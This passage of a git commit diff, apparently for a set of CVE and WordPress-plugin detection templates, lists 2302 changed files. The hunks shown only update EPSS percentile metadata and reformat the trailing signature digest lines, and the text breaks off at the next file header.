++++--- http/cves/2023/CVE-2023-0236.yaml | 5 +++-- http/cves/2023/CVE-2023-0261.yaml | 5 +++-- http/cves/2023/CVE-2023-0297.yaml | 2 +- http/cves/2023/CVE-2023-0334.yaml | 5 +++-- http/cves/2023/CVE-2023-0448.yaml | 5 +++-- http/cves/2023/CVE-2023-0514.yaml | 5 +++-- http/cves/2023/CVE-2023-0527.yaml | 5 +++-- http/cves/2023/CVE-2023-0552.yaml | 5 +++-- http/cves/2023/CVE-2023-0562.yaml | 5 +++-- http/cves/2023/CVE-2023-0563.yaml | 5 +++-- http/cves/2023/CVE-2023-0600.yaml | 5 +++-- http/cves/2023/CVE-2023-0602.yaml | 5 +++-- http/cves/2023/CVE-2023-0630.yaml | 5 +++-- http/cves/2023/CVE-2023-0669.yaml | 5 +++-- http/cves/2023/CVE-2023-0777.yaml | 5 +++-- http/cves/2023/CVE-2023-0900.yaml | 5 +++-- http/cves/2023/CVE-2023-0942.yaml | 5 +++-- http/cves/2023/CVE-2023-0947.yaml | 5 +++-- http/cves/2023/CVE-2023-0948.yaml | 5 +++-- http/cves/2023/CVE-2023-0968.yaml | 5 +++-- http/cves/2023/CVE-2023-1020.yaml | 5 +++-- http/cves/2023/CVE-2023-1080.yaml | 5 +++-- http/cves/2023/CVE-2023-1177.yaml | 5 +++-- http/cves/2023/CVE-2023-1263.yaml | 5 +++-- http/cves/2023/CVE-2023-1362.yaml | 5 +++-- http/cves/2023/CVE-2023-1408.yaml | 5 +++-- http/cves/2023/CVE-2023-1454.yaml | 5 +++-- http/cves/2023/CVE-2023-1496.yaml | 5 +++-- http/cves/2023/CVE-2023-1546.yaml | 5 +++-- http/cves/2023/CVE-2023-1671.yaml | 5 +++-- http/cves/2023/CVE-2023-1698.yaml | 5 +++-- http/cves/2023/CVE-2023-1730.yaml | 5 +++-- http/cves/2023/CVE-2023-1780.yaml | 5 +++-- http/cves/2023/CVE-2023-1835.yaml | 5 +++-- http/cves/2023/CVE-2023-1880.yaml | 5 +++-- http/cves/2023/CVE-2023-1890.yaml | 5 +++-- http/cves/2023/CVE-2023-20073.yaml | 5 +++-- http/cves/2023/CVE-2023-2009.yaml | 5 +++-- http/cves/2023/CVE-2023-20198.yaml | 5 +++-- http/cves/2023/CVE-2023-2023.yaml | 5 +++-- http/cves/2023/CVE-2023-20864.yaml | 5 +++-- http/cves/2023/CVE-2023-20887.yaml | 5 +++-- http/cves/2023/CVE-2023-20888.yaml | 5 +++-- http/cves/2023/CVE-2023-20889.yaml | 5 +++-- http/cves/2023/CVE-2023-2122.yaml | 5 +++-- http/cves/2023/CVE-2023-2130.yaml | 5 +++-- http/cves/2023/CVE-2023-2178.yaml | 5 +++-- http/cves/2023/CVE-2023-2224.yaml | 5 +++-- http/cves/2023/CVE-2023-22432.yaml | 5 +++-- http/cves/2023/CVE-2023-22463.yaml | 5 +++-- http/cves/2023/CVE-2023-22478.yaml | 5 +++-- http/cves/2023/CVE-2023-22480.yaml | 5 +++-- http/cves/2023/CVE-2023-22515.yaml | 5 +++-- http/cves/2023/CVE-2023-22518.yaml | 7 ++++--- http/cves/2023/CVE-2023-22620.yaml | 5 +++-- http/cves/2023/CVE-2023-2272.yaml | 5 +++-- http/cves/2023/CVE-2023-22897.yaml | 5 +++-- http/cves/2023/CVE-2023-23161.yaml | 5 +++-- http/cves/2023/CVE-2023-23333.yaml | 5 +++-- http/cves/2023/CVE-2023-23488.yaml | 5 +++-- http/cves/2023/CVE-2023-23489.yaml | 2 +- http/cves/2023/CVE-2023-23491.yaml | 5 +++-- http/cves/2023/CVE-2023-23492.yaml | 5 +++-- http/cves/2023/CVE-2023-2356.yaml | 5 +++-- http/cves/2023/CVE-2023-23752.yaml | 5 +++-- http/cves/2023/CVE-2023-24044.yaml | 5 +++-- http/cves/2023/CVE-2023-24243.yaml | 5 +++-- http/cves/2023/CVE-2023-24278.yaml | 7 ++++--- http/cves/2023/CVE-2023-24322.yaml | 5 +++-- http/cves/2023/CVE-2023-24488.yaml | 5 +++-- http/cves/2023/CVE-2023-24489.yaml | 5 +++-- http/cves/2023/CVE-2023-24657.yaml | 5 +++-- http/cves/2023/CVE-2023-24733.yaml | 5 +++-- http/cves/2023/CVE-2023-24735.yaml | 7 ++++--- http/cves/2023/CVE-2023-24737.yaml | 5 +++-- http/cves/2023/CVE-2023-2479.yaml | 2 +- http/cves/2023/CVE-2023-25135.yaml | 5 +++-- http/cves/2023/CVE-2023-25157.yaml | 7 ++++--- http/cves/2023/CVE-2023-25346.yaml | 5 +++-- http/cves/2023/CVE-2023-25573.yaml | 5 +++-- http/cves/2023/CVE-2023-25717.yaml | 5 +++-- http/cves/2023/CVE-2023-26067.yaml | 5 +++-- http/cves/2023/CVE-2023-26255.yaml | 5 +++-- http/cves/2023/CVE-2023-26256.yaml | 5 +++-- http/cves/2023/CVE-2023-26360.yaml | 5 +++-- http/cves/2023/CVE-2023-26469.yaml | 2 +- http/cves/2023/CVE-2023-2648.yaml | 5 +++-- http/cves/2023/CVE-2023-26842.yaml | 5 +++-- http/cves/2023/CVE-2023-26843.yaml | 5 +++-- http/cves/2023/CVE-2023-27008.yaml | 5 +++-- http/cves/2023/CVE-2023-27034.yaml | 5 +++-- http/cves/2023/CVE-2023-27159.yaml | 5 +++-- http/cves/2023/CVE-2023-27179.yaml | 5 +++-- http/cves/2023/CVE-2023-27292.yaml | 5 +++-- http/cves/2023/CVE-2023-2732.yaml | 5 +++-- http/cves/2023/CVE-2023-27350.yaml | 2 +- http/cves/2023/CVE-2023-27372.yaml | 5 +++-- http/cves/2023/CVE-2023-27482.yaml | 5 +++-- http/cves/2023/CVE-2023-27524.yaml | 5 +++-- http/cves/2023/CVE-2023-27587.yaml | 5 +++-- http/cves/2023/CVE-2023-2766.yaml | 5 +++-- http/cves/2023/CVE-2023-2779.yaml | 5 +++-- http/cves/2023/CVE-2023-2780.yaml | 5 +++-- http/cves/2023/CVE-2023-27922.yaml | 5 +++-- http/cves/2023/CVE-2023-2796.yaml | 5 +++-- http/cves/2023/CVE-2023-28121.yaml | 5 +++-- http/cves/2023/CVE-2023-2813.yaml | 5 +++-- http/cves/2023/CVE-2023-2822.yaml | 5 +++-- http/cves/2023/CVE-2023-2825.yaml | 5 +++-- http/cves/2023/CVE-2023-28343.yaml | 5 +++-- http/cves/2023/CVE-2023-28432.yaml | 5 +++-- http/cves/2023/CVE-2023-28665.yaml | 5 +++-- http/cves/2023/CVE-2023-29084.yaml | 2 +- http/cves/2023/CVE-2023-29298.yaml | 5 +++-- http/cves/2023/CVE-2023-29300.yaml | 5 +++-- http/cves/2023/CVE-2023-29357.yaml | 5 +++-- http/cves/2023/CVE-2023-29439.yaml | 5 +++-- http/cves/2023/CVE-2023-29489.yaml | 5 +++-- http/cves/2023/CVE-2023-29622.yaml | 5 +++-- http/cves/2023/CVE-2023-29623.yaml | 5 +++-- http/cves/2023/CVE-2023-2982.yaml | 5 +++-- http/cves/2023/CVE-2023-29887.yaml | 5 +++-- http/cves/2023/CVE-2023-29919.yaml | 5 +++-- http/cves/2023/CVE-2023-29922.yaml | 5 +++-- http/cves/2023/CVE-2023-29923.yaml | 5 +++-- http/cves/2023/CVE-2023-30013.yaml | 5 +++-- http/cves/2023/CVE-2023-30019.yaml | 5 +++-- http/cves/2023/CVE-2023-30150.yaml | 5 +++-- http/cves/2023/CVE-2023-30210.yaml | 5 +++-- http/cves/2023/CVE-2023-30212.yaml | 5 +++-- http/cves/2023/CVE-2023-30256.yaml | 5 +++-- http/cves/2023/CVE-2023-30625.yaml | 7 ++++--- http/cves/2023/CVE-2023-30777.yaml | 5 +++-- http/cves/2023/CVE-2023-30868.yaml | 5 +++-- http/cves/2023/CVE-2023-30943.yaml | 5 +++-- http/cves/2023/CVE-2023-31059.yaml | 5 +++-- http/cves/2023/CVE-2023-31465.yaml | 5 +++-- http/cves/2023/CVE-2023-31548.yaml | 5 +++-- http/cves/2023/CVE-2023-3219.yaml | 5 +++-- http/cves/2023/CVE-2023-32235.yaml | 5 +++-- http/cves/2023/CVE-2023-32243.yaml | 5 +++-- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-32563.yaml | 5 +++-- http/cves/2023/CVE-2023-33338.yaml | 5 +++-- http/cves/2023/CVE-2023-33405.yaml | 5 +++-- http/cves/2023/CVE-2023-33439.yaml | 5 +++-- http/cves/2023/CVE-2023-33440.yaml | 5 +++-- http/cves/2023/CVE-2023-3345.yaml | 5 +++-- http/cves/2023/CVE-2023-33510.yaml | 5 +++-- http/cves/2023/CVE-2023-33568.yaml | 5 +++-- http/cves/2023/CVE-2023-33584.yaml | 5 +++-- http/cves/2023/CVE-2023-33629.yaml | 5 +++-- http/cves/2023/CVE-2023-33831.yaml | 5 +++-- http/cves/2023/CVE-2023-34124.yaml | 5 +++-- http/cves/2023/CVE-2023-34192.yaml | 5 +++-- http/cves/2023/CVE-2023-34259.yaml | 7 +++++-- http/cves/2023/CVE-2023-34362.yaml | 5 +++-- http/cves/2023/CVE-2023-34537.yaml | 5 +++-- http/cves/2023/CVE-2023-34598.yaml | 5 +++-- http/cves/2023/CVE-2023-34599.yaml | 5 +++-- http/cves/2023/CVE-2023-3460.yaml | 2 +- http/cves/2023/CVE-2023-34659.yaml | 5 +++-- http/cves/2023/CVE-2023-34751.yaml | 5 +++-- http/cves/2023/CVE-2023-34752.yaml | 5 +++-- http/cves/2023/CVE-2023-34753.yaml | 5 +++-- http/cves/2023/CVE-2023-34755.yaml | 5 +++-- http/cves/2023/CVE-2023-34756.yaml | 5 +++-- http/cves/2023/CVE-2023-3479.yaml | 5 +++-- http/cves/2023/CVE-2023-34843.yaml | 5 +++-- http/cves/2023/CVE-2023-34960.yaml | 5 +++-- http/cves/2023/CVE-2023-35078.yaml | 2 +- http/cves/2023/CVE-2023-35082.yaml | 5 +++-- http/cves/2023/CVE-2023-35813.yaml | 5 +++-- http/cves/2023/CVE-2023-35843.yaml | 5 +++-- http/cves/2023/CVE-2023-35844.yaml | 5 +++-- http/cves/2023/CVE-2023-35885.yaml | 5 +++-- http/cves/2023/CVE-2023-36287.yaml | 5 +++-- http/cves/2023/CVE-2023-36289.yaml | 5 +++-- http/cves/2023/CVE-2023-36306.yaml | 5 +++-- http/cves/2023/CVE-2023-36346.yaml | 5 +++-- http/cves/2023/CVE-2023-36844.yaml | 5 +++-- http/cves/2023/CVE-2023-36845.yaml | 5 +++-- http/cves/2023/CVE-2023-36934.yaml | 5 +++-- http/cves/2023/CVE-2023-3710.yaml | 5 +++-- http/cves/2023/CVE-2023-37265.yaml | 5 +++-- http/cves/2023/CVE-2023-37266.yaml | 5 +++-- http/cves/2023/CVE-2023-37270.yaml | 5 +++-- http/cves/2023/CVE-2023-37462.yaml | 5 +++-- http/cves/2023/CVE-2023-37474.yaml | 5 +++-- http/cves/2023/CVE-2023-37580.yaml | 5 +++-- http/cves/2023/CVE-2023-37629.yaml | 5 +++-- http/cves/2023/CVE-2023-3765.yaml | 5 +++-- http/cves/2023/CVE-2023-37679.yaml | 5 +++-- http/cves/2023/CVE-2023-37728.yaml | 5 +++-- http/cves/2023/CVE-2023-37979.yaml | 5 +++-- http/cves/2023/CVE-2023-38035.yaml | 2 +- http/cves/2023/CVE-2023-38205.yaml | 5 +++-- http/cves/2023/CVE-2023-3836.yaml | 5 +++-- http/cves/2023/CVE-2023-3843.yaml | 5 +++-- http/cves/2023/CVE-2023-38433.yaml | 5 +++-- http/cves/2023/CVE-2023-3844.yaml | 5 +++-- http/cves/2023/CVE-2023-3845.yaml | 5 +++-- http/cves/2023/CVE-2023-3846.yaml | 5 +++-- http/cves/2023/CVE-2023-3847.yaml | 5 +++-- http/cves/2023/CVE-2023-3848.yaml | 5 +++-- http/cves/2023/CVE-2023-3849.yaml | 5 +++-- http/cves/2023/CVE-2023-38501.yaml | 5 +++-- http/cves/2023/CVE-2023-38646.yaml | 5 +++-- http/cves/2023/CVE-2023-39026.yaml | 5 +++-- http/cves/2023/CVE-2023-39108.yaml | 5 +++-- http/cves/2023/CVE-2023-39109.yaml | 5 +++-- http/cves/2023/CVE-2023-39110.yaml | 5 +++-- http/cves/2023/CVE-2023-39141.yaml | 5 +++-- http/cves/2023/CVE-2023-39143.yaml | 5 +++-- http/cves/2023/CVE-2023-3936.yaml | 5 +++-- http/cves/2023/CVE-2023-39361.yaml | 5 +++-- http/cves/2023/CVE-2023-39598.yaml | 5 +++-- http/cves/2023/CVE-2023-39600.yaml | 5 +++-- http/cves/2023/CVE-2023-39676.yaml | 5 +++-- http/cves/2023/CVE-2023-39677.yaml | 5 +++-- http/cves/2023/CVE-2023-39700.yaml | 5 +++-- http/cves/2023/CVE-2023-40208.yaml | 5 +++-- http/cves/2023/CVE-2023-40779.yaml | 5 +++-- http/cves/2023/CVE-2023-4110.yaml | 5 +++-- http/cves/2023/CVE-2023-4111.yaml | 5 +++-- http/cves/2023/CVE-2023-4112.yaml | 5 +++-- http/cves/2023/CVE-2023-4113.yaml | 5 +++-- http/cves/2023/CVE-2023-4114.yaml | 5 +++-- http/cves/2023/CVE-2023-4115.yaml | 5 +++-- http/cves/2023/CVE-2023-4116.yaml | 5 +++-- http/cves/2023/CVE-2023-4148.yaml | 5 +++-- http/cves/2023/CVE-2023-41538.yaml | 5 +++-- http/cves/2023/CVE-2023-41642.yaml | 5 +++-- http/cves/2023/CVE-2023-4168.yaml | 5 +++-- http/cves/2023/CVE-2023-4169.yaml | 5 +++-- http/cves/2023/CVE-2023-4173.yaml | 5 +++-- http/cves/2023/CVE-2023-4174.yaml | 5 +++-- http/cves/2023/CVE-2023-41892.yaml | 5 +++-- http/cves/2023/CVE-2023-42442.yaml | 5 +++-- http/cves/2023/CVE-2023-42793.yaml | 2 +- http/cves/2023/CVE-2023-43261.yaml | 5 +++-- http/cves/2023/CVE-2023-43795.yaml | 7 ++++--- http/cves/2023/CVE-2023-4415.yaml | 5 +++-- http/cves/2023/CVE-2023-4451.yaml | 5 +++-- http/cves/2023/CVE-2023-4547.yaml | 5 +++-- http/cves/2023/CVE-2023-4568.yaml | 5 +++-- http/cves/2023/CVE-2023-45852.yaml | 5 +++-- http/cves/2023/CVE-2023-4634.yaml | 5 +++-- http/cves/2023/CVE-2023-46747.yaml | 7 ++++--- http/cves/2023/CVE-2023-4714.yaml | 5 +++-- http/cves/2023/CVE-2023-4966.yaml | 3 ++- http/cves/2023/CVE-2023-4974.yaml | 5 +++-- http/cves/2023/CVE-2023-5074.yaml | 5 +++-- http/cves/2023/CVE-2023-5244.yaml | 5 +++-- http/cves/2023/CVE-2023-5360.yaml | 5 +++-- http/misconfiguration/installer/sugarcrm-install.yaml | 4 +++- http/technologies/wordpress/plugins/ad-inserter.yaml | 3 ++- http/technologies/wordpress/plugins/add-to-any.yaml | 3 ++- .../wordpress/plugins/admin-menu-editor.yaml | 3 ++- .../wordpress/plugins/advanced-custom-fields.yaml | 3 ++- http/technologies/wordpress/plugins/akismet.yaml | 3 ++- .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 3 ++- .../wordpress/plugins/all-in-one-seo-pack.yaml | 3 ++- .../wordpress/plugins/all-in-one-wp-migration.yaml | 3 ++- .../plugins/all-in-one-wp-security-and-firewall.yaml | 3 ++- http/technologies/wordpress/plugins/amp.yaml | 3 ++- http/technologies/wordpress/plugins/antispam-bee.yaml | 3 ++- http/technologies/wordpress/plugins/astra-sites.yaml | 3 ++- http/technologies/wordpress/plugins/astra-widgets.yaml | 3 ++- http/technologies/wordpress/plugins/autoptimize.yaml | 3 ++- http/technologies/wordpress/plugins/backwpup.yaml | 3 ++- .../wordpress/plugins/better-search-replace.yaml | 3 ++- .../wordpress/plugins/better-wp-security.yaml | 3 ++- .../wordpress/plugins/black-studio-tinymce-widget.yaml | 3 ++- .../technologies/wordpress/plugins/breadcrumb-navxt.yaml | 3 ++- http/technologies/wordpress/plugins/breeze.yaml | 3 ++- .../wordpress/plugins/broken-link-checker.yaml | 3 ++- .../wordpress/plugins/child-theme-configurator.yaml | 3 ++- http/technologies/wordpress/plugins/classic-editor.yaml | 3 ++- http/technologies/wordpress/plugins/classic-widgets.yaml | 3 ++- .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 3 ++- http/technologies/wordpress/plugins/cmb2.yaml | 3 ++- http/technologies/wordpress/plugins/coblocks.yaml | 3 ++- http/technologies/wordpress/plugins/code-snippets.yaml | 3 ++- http/technologies/wordpress/plugins/coming-soon.yaml | 3 ++- http/technologies/wordpress/plugins/complianz-gdpr.yaml | 3 ++- .../wordpress/plugins/contact-form-7-honeypot.yaml | 3 ++- http/technologies/wordpress/plugins/contact-form-7.yaml | 3 ++- .../wordpress/plugins/contact-form-cfdb7.yaml | 3 ++- http/technologies/wordpress/plugins/cookie-law-info.yaml | 3 ++- http/technologies/wordpress/plugins/cookie-notice.yaml | 3 ++- .../wordpress/plugins/creame-whatsapp-me.yaml | 3 ++- .../plugins/creative-mail-by-constant-contact.yaml | 3 ++- http/technologies/wordpress/plugins/custom-css-js.yaml | 3 ++- http/technologies/wordpress/plugins/custom-fonts.yaml | 3 ++- .../wordpress/plugins/custom-post-type-ui.yaml | 3 ++- .../technologies/wordpress/plugins/disable-comments.yaml | 3 ++- .../wordpress/plugins/disable-gutenberg.yaml | 3 ++- http/technologies/wordpress/plugins/duplicate-page.yaml | 3 ++- http/technologies/wordpress/plugins/duplicate-post.yaml | 3 ++- http/technologies/wordpress/plugins/duplicator.yaml | 3 ++- .../plugins/duracelltomi-google-tag-manager.yaml | 3 ++- http/technologies/wordpress/plugins/easy-fancybox.yaml | 3 ++- .../wordpress/plugins/easy-table-of-contents.yaml | 3 ++- http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 3 ++- http/technologies/wordpress/plugins/elementor.yaml | 3 ++- .../technologies/wordpress/plugins/elementskit-lite.yaml | 3 ++- .../wordpress/plugins/enable-media-replace.yaml | 3 ++- http/technologies/wordpress/plugins/envato-elements.yaml | 3 ++- .../plugins/essential-addons-for-elementor-lite.yaml | 3 ++- .../wordpress/plugins/ewww-image-optimizer.yaml | 3 ++- .../wordpress/plugins/facebook-for-woocommerce.yaml | 3 ++- .../wordpress/plugins/fast-indexing-api.yaml | 3 ++- .../plugins/favicon-by-realfavicongenerator.yaml | 3 ++- http/technologies/wordpress/plugins/flamingo.yaml | 3 ++- http/technologies/wordpress/plugins/fluentform.yaml | 3 ++- http/technologies/wordpress/plugins/font-awesome.yaml | 3 ++- .../wordpress/plugins/force-regenerate-thumbnails.yaml | 3 ++- http/technologies/wordpress/plugins/formidable.yaml | 3 ++- http/technologies/wordpress/plugins/forminator.yaml | 3 ++- .../wordpress/plugins/ga-google-analytics.yaml | 3 ++- .../wordpress/plugins/gdpr-cookie-compliance.yaml | 3 ++- .../plugins/google-analytics-dashboard-for-wp.yaml | 3 ++- .../plugins/google-analytics-for-wordpress.yaml | 3 ++- .../wordpress/plugins/google-listings-and-ads.yaml | 3 ++- http/technologies/wordpress/plugins/google-site-kit.yaml | 3 ++- .../wordpress/plugins/google-sitemap-generator.yaml | 3 ++- http/technologies/wordpress/plugins/gtranslate.yaml | 3 ++- http/technologies/wordpress/plugins/gutenberg.yaml | 3 ++- .../wordpress/plugins/happy-elementor-addons.yaml | 3 ++- .../wordpress/plugins/header-footer-code-manager.yaml | 3 ++- .../wordpress/plugins/header-footer-elementor.yaml | 3 ++- http/technologies/wordpress/plugins/header-footer.yaml | 3 ++- http/technologies/wordpress/plugins/health-check.yaml | 3 ++- http/technologies/wordpress/plugins/hello-dolly.yaml | 3 ++- .../wordpress/plugins/host-webfonts-local.yaml | 3 ++- http/technologies/wordpress/plugins/imagify.yaml | 3 ++- http/technologies/wordpress/plugins/imsanity.yaml | 3 ++- .../wordpress/plugins/insert-headers-and-footers.yaml | 3 ++- http/technologies/wordpress/plugins/instagram-feed.yaml | 3 ++- .../wordpress/plugins/intuitive-custom-post-order.yaml | 3 ++- http/technologies/wordpress/plugins/iwp-client.yaml | 3 ++- http/technologies/wordpress/plugins/jetpack-boost.yaml | 3 ++- http/technologies/wordpress/plugins/jetpack.yaml | 3 ++- http/technologies/wordpress/plugins/kadence-blocks.yaml | 3 ++- http/technologies/wordpress/plugins/kirki.yaml | 3 ++- http/technologies/wordpress/plugins/leadin.yaml | 3 ++- .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 3 ++- .../wordpress/plugins/limit-login-attempts.yaml | 3 ++- http/technologies/wordpress/plugins/litespeed-cache.yaml | 3 ++- http/technologies/wordpress/plugins/loco-translate.yaml | 3 ++- http/technologies/wordpress/plugins/loginizer.yaml | 3 ++- .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 3 ++- .../technologies/wordpress/plugins/mailchimp-for-wp.yaml | 3 ++- http/technologies/wordpress/plugins/mailpoet.yaml | 3 ++- http/technologies/wordpress/plugins/maintenance.yaml | 3 ++- http/technologies/wordpress/plugins/mainwp-child.yaml | 3 ++- .../technologies/wordpress/plugins/malcare-security.yaml | 3 ++- http/technologies/wordpress/plugins/megamenu.yaml | 3 ++- http/technologies/wordpress/plugins/members.yaml | 3 ++- http/technologies/wordpress/plugins/meta-box.yaml | 3 ++- http/technologies/wordpress/plugins/metform.yaml | 3 ++- http/technologies/wordpress/plugins/ml-slider.yaml | 3 ++- http/technologies/wordpress/plugins/newsletter.yaml | 3 ++- .../wordpress/plugins/nextend-facebook-connect.yaml | 3 ++- http/technologies/wordpress/plugins/nextgen-gallery.yaml | 3 ++- http/technologies/wordpress/plugins/ninja-forms.yaml | 3 ++- http/technologies/wordpress/plugins/ocean-extra.yaml | 3 ++- .../wordpress/plugins/official-facebook-pixel.yaml | 3 ++- .../wordpress/plugins/one-click-demo-import.yaml | 3 ++- http/technologies/wordpress/plugins/optinmonster.yaml | 3 ++- http/technologies/wordpress/plugins/otter-blocks.yaml | 3 ++- .../wordpress/plugins/password-protected.yaml | 3 ++- http/technologies/wordpress/plugins/pdf-embedder.yaml | 3 ++- .../wordpress/plugins/pinterest-for-woocommerce.yaml | 3 ++- http/technologies/wordpress/plugins/pixelyoursite.yaml | 3 ++- http/technologies/wordpress/plugins/polylang.yaml | 3 ++- http/technologies/wordpress/plugins/popup-builder.yaml | 3 ++- http/technologies/wordpress/plugins/popup-maker.yaml | 3 ++- http/technologies/wordpress/plugins/post-smtp.yaml | 3 ++- .../technologies/wordpress/plugins/post-types-order.yaml | 3 ++- .../wordpress/plugins/premium-addons-for-elementor.yaml | 3 ++- http/technologies/wordpress/plugins/pretty-link.yaml | 3 ++- .../wordpress/plugins/really-simple-captcha.yaml | 3 ++- .../wordpress/plugins/really-simple-ssl.yaml | 3 ++- http/technologies/wordpress/plugins/redirection.yaml | 3 ++- http/technologies/wordpress/plugins/redux-framework.yaml | 3 ++- .../wordpress/plugins/regenerate-thumbnails.yaml | 3 ++- http/technologies/wordpress/plugins/safe-svg.yaml | 3 ++- .../technologies/wordpress/plugins/seo-by-rank-math.yaml | 3 ++- http/technologies/wordpress/plugins/sg-cachepress.yaml | 3 ++- http/technologies/wordpress/plugins/sg-security.yaml | 3 ++- .../wordpress/plugins/shortcodes-ultimate.yaml | 3 ++- .../wordpress/plugins/shortpixel-image-optimiser.yaml | 3 ++- .../wordpress/plugins/simple-custom-post-order.yaml | 3 ++- http/technologies/wordpress/plugins/siteguard.yaml | 3 ++- .../wordpress/plugins/siteorigin-panels.yaml | 3 ++- http/technologies/wordpress/plugins/smart-slider-3.yaml | 3 ++- .../wordpress/plugins/so-widgets-bundle.yaml | 3 ++- .../plugins/stops-core-theme-and-plugin-updates.yaml | 3 ++- http/technologies/wordpress/plugins/sucuri-scanner.yaml | 3 ++- http/technologies/wordpress/plugins/svg-support.yaml | 3 ++- .../wordpress/plugins/table-of-contents-plus.yaml | 3 ++- http/technologies/wordpress/plugins/tablepress.yaml | 3 ++- .../wordpress/plugins/taxonomy-terms-order.yaml | 3 ++- .../wordpress/plugins/the-events-calendar.yaml | 3 ++- .../technologies/wordpress/plugins/tinymce-advanced.yaml | 3 ++- .../wordpress/plugins/translatepress-multilingual.yaml | 3 ++- .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 3 ++- .../wordpress/plugins/under-construction-page.yaml | 3 ++- http/technologies/wordpress/plugins/updraftplus.yaml | 3 ++- http/technologies/wordpress/plugins/use-any-font.yaml | 3 ++- .../technologies/wordpress/plugins/user-role-editor.yaml | 3 ++- .../wordpress/plugins/velvet-blues-update-urls.yaml | 3 ++- http/technologies/wordpress/plugins/w3-total-cache.yaml | 3 ++- .../wordpress/plugins/webp-converter-for-media.yaml | 3 ++- http/technologies/wordpress/plugins/webp-express.yaml | 3 ++- .../wordpress/plugins/widget-importer-exporter.yaml | 3 ++- .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 3 ++- .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 3 ++- .../wordpress/plugins/woo-variation-swatches.yaml | 3 ++- .../woocommerce-gateway-paypal-express-checkout.yaml | 3 ++- .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 3 ++- .../wordpress/plugins/woocommerce-payments.yaml | 3 ++- .../wordpress/plugins/woocommerce-paypal-payments.yaml | 3 ++- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 3 ++- .../wordpress/plugins/woocommerce-services.yaml | 3 ++- http/technologies/wordpress/plugins/woocommerce.yaml | 3 ++- http/technologies/wordpress/plugins/wordfence.yaml | 3 ++- .../wordpress/plugins/wordpress-importer.yaml | 3 ++- http/technologies/wordpress/plugins/wordpress-seo.yaml | 3 ++- http/technologies/wordpress/plugins/worker.yaml | 3 ++- .../technologies/wordpress/plugins/wp-fastest-cache.yaml | 3 ++- http/technologies/wordpress/plugins/wp-file-manager.yaml | 3 ++- http/technologies/wordpress/plugins/wp-google-maps.yaml | 3 ++- http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 3 ++- .../wordpress/plugins/wp-maintenance-mode.yaml | 3 ++- http/technologies/wordpress/plugins/wp-migrate-db.yaml | 3 ++- .../wordpress/plugins/wp-multibyte-patch.yaml | 3 ++- http/technologies/wordpress/plugins/wp-optimize.yaml | 3 ++- http/technologies/wordpress/plugins/wp-pagenavi.yaml | 3 ++- http/technologies/wordpress/plugins/wp-reset.yaml | 3 ++- .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 3 ++- http/technologies/wordpress/plugins/wp-rollback.yaml | 3 ++- http/technologies/wordpress/plugins/wp-seopress.yaml | 3 ++- http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 3 ++- http/technologies/wordpress/plugins/wp-smushit.yaml | 3 ++- http/technologies/wordpress/plugins/wp-statistics.yaml | 3 ++- http/technologies/wordpress/plugins/wp-super-cache.yaml | 3 ++- http/technologies/wordpress/plugins/wp-user-avatar.yaml | 3 ++- http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 3 ++- http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 3 ++- http/technologies/wordpress/plugins/wpforms-lite.yaml | 3 ++- http/technologies/wordpress/plugins/wps-hide-login.yaml | 3 ++- .../wordpress/plugins/wpvivid-backuprestore.yaml | 3 ++- .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 3 ++- .../apache/apache-druid-kafka-connect-rce.yaml | 5 +++-- http/vulnerabilities/other/ecology-oa-file-sqli.yaml | 3 ++- network/cves/2022/CVE-2022-31793.yaml | 5 +++-- 2302 files changed, 6403 insertions(+), 4245 deletions(-) diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 0ebb22709c..771b69ac77 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other epss-score: 0.09258 - epss-percentile: 0.94023 + epss-percentile: 0.94032 cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c84395302e99bdf0b20a9356c4bfa8320a98705668294c93fea77fcedef9584f022100a6d17481b87ca99564d3d12942edd7752dd83a9b0ebc29f716d5ad38883d6e04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c84395302e99bdf0b20a9356c4bfa8320a98705668294c93fea77fcedef9584f022100a6d17481b87ca99564d3d12942edd7752dd83a9b0ebc29f716d5ad38883d6e04:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 789137fe6c..043fa69dc2 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2001-0537 cwe-id: CWE-287 epss-score: 0.88063 - epss-percentile: 0.9833 + epss-percentile: 0.98333 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f6fbc2eb4fe8ebdc1e805da5747f8a6768f5c3c56c74935d313f0adb01b8a6f9022100d0433c5b6dd862ca4a405d7855a53a1e152e3205d4adf1b3cb9d5f51330c3530:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f6fbc2eb4fe8ebdc1e805da5747f8a6768f5c3c56c74935d313f0adb01b8a6f9022100d0433c5b6dd862ca4a405d7855a53a1e152e3205d4adf1b3cb9d5f51330c3530:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2002/CVE-2002-1131.yaml 